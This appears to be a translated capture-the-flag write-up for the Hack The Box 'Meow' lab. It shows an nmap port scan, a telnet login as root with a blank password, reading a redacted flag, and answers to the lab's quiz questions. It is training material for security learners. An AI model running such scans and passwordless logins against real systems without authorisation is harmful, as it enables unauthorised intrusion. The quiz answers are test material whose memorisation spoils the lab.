This post was originally written in Spanish and translated into English using a large language model (LLM). Although the translation has been reviewed, it may contain inaccuracies or inconsistencies.

Description

This post begins the Tier 0 Starting Point machines. The first one is Meow, which I selected for this initial write-up.

I will focus on the exploitation process because several of the accompanying questions do not add anything useful. When a question provides information required for exploitation, I will reference it during the process.

Exploitation Process

Reconnaissance

Port Scanning

We begin with a basic scan to find the open ports on the machine:

1
2
3
nmap --open -p- 10.129.74.180 -T5 -oG Puertos
Host: 10.129.74.180 () Status: Up
Host: 10.129.74.180 () Ports: 23/open/tcp//telnet///

We can see that Telnet is open, so we run Nmap’s default scripts against port 23.

1
2
3
4
5
6
7
nmap -sCV -p 23 -oN Objetivos 10.129.1.17
Nmap scan report for 10.129.1.17
Host is up (0.047s latency).

PORT STATE SERVICE VERSION
23/tcp open telnet Linux telnetd
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The target appears to be a Linux machine, but the scan does not reveal much information. With no other ports through which to attempt to compromise the host, we can try logging in over Telnet.

Connecting via Telnet (Foothold as Root)

We attempt to connect as the root user.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
❯ telnet 10.129.1.17
Trying 10.129.1.17...
Connected to 10.129.1.17.
Escape character is '^]'.

█ █ ▐▌ ▄█▄ █ ▄▄▄▄
█▄▄█ ▀▀█ █▀▀ ▐▌▄▀ █ █▀█ █▀█ █▌▄█ ▄▀▀▄ ▀▄▀
█ █ █▄█ █▄▄ ▐█▀▄ █ █ █ █▄▄ █▌▄█ ▀▄▄▀ █▀█


Meow login: root
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-77-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Wed 06 Jul 2022 01:03:13 AM UTC

System load: 0.0
Usage of /: 41.7% of 7.75GB
Memory usage: 4%
Swap usage: 0%
Processes: 136
Users logged in: 0
IPv4 address for eth0: 10.129.1.17
IPv6 address for eth0: dead:beef::250:56ff:fe96:d4ec

* Super-optimized for small spaces - read how we shrank the memory
footprint of MicroK8s to make it the smallest full K8s around.

https://ubuntu.com/blog/microk8s-memory-optimisation

75 updates can be applied immediately.
31 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Mon Sep 6 15:15:23 UTC 2021 from 10.10.14.18 on pts/0
root@Meow:~#

Because of a configuration error, the root account has no password, giving us immediate access to the machine. As root, all that remains is to find the flag.

1
2
3
4
5
6
7
root@Meow:~# pwd
/root
root@Meow:~# ls
flag.txt snap
root@Meow:~# cat flag.txt
b40axxxxxxxxxxxxxxxxxxxxxxxxxxxx

We have successfully exploited the first Tier 0 Starting Point machine.

Answers

Question 1

What does the acronym VM stand for?

Virtual Machine

Question 2

What tool do we use to interact with the operating system in order to issue commands via the command line, such as the one to start our VPN connection? It’s also known as a console or shell.

terminal

Question 3

What service do we use to form our VPN connection into HTB labs?

openvpn

Question 4

What is the abbreviated name for a ‘tunnel interface’ in the output of your VPN boot-up sequence output?

tun

Question 5

What tool do we use to test our connection to the target with an ICMP echo request?

ping

Question 6

What is the name of the most common tool for finding open ports on a target?

nmap

Question 7

What service do we identify on port 23/tcp during our scans?

telnet

Question 8

What username is able to log into the target over telnet with a blank password?

root

Flag

Submit root flag

b40xxxxxxxxxxxxxxxxxxxxxxxxxxxxx